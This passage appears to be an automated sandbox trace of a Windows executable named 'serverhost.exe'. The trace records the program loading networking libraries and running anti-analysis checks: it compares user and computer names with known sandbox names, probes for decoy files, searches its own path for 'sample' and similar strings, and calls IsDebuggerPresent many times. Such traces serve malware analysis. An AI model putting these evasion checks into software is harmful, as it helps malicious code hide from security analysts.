(lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.755] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.761] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.769] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.769] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.769] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.769] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.769] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.769] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.769] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.915] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.915] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.915] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.916] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.916] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.916] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.916] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0054.916] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0054.916] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0054.916] GetUserNameA (in: lpBuffer=0x12fb5c, pcbBuffer=0x12f958 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x12f958) returned 1 [0054.919] GetComputerNameA (in: lpBuffer=0x12fa5c, nSize=0x12f958 | out: lpBuffer="F71GWAT", nSize=0x12f958) returned 1 [0054.920] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x12f95c, nSize=0x12f958 | out: lpBuffer="F71gwat", nSize=0x12f958) returned 1 [0054.920] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0054.921] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0054.921] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0054.921] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0054.921] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0054.921] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0054.921] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.921] CloseHandle (hObject=0xffffffff) returned 0 [0054.921] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.921] CloseHandle (hObject=0xffffffff) returned 0 [0054.921] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0054.921] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12fb68, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0054.922] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="sample") returned 0x0 [0054.922] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="mlwr_smpl") returned 0x0 [0054.922] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpSrch="artifact.exe") returned 0x0 [0054.922] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.922] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.923] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.924] IsDebuggerPresent () returned 0 [0054.924] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.925] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] IsDebuggerPresent () returned 0 [0054.926] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.926] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.927] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.928] IsDebuggerPresent () returned 0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] IsDebuggerPresent () returned 0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.929] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.930] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.931] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.932] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.933] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 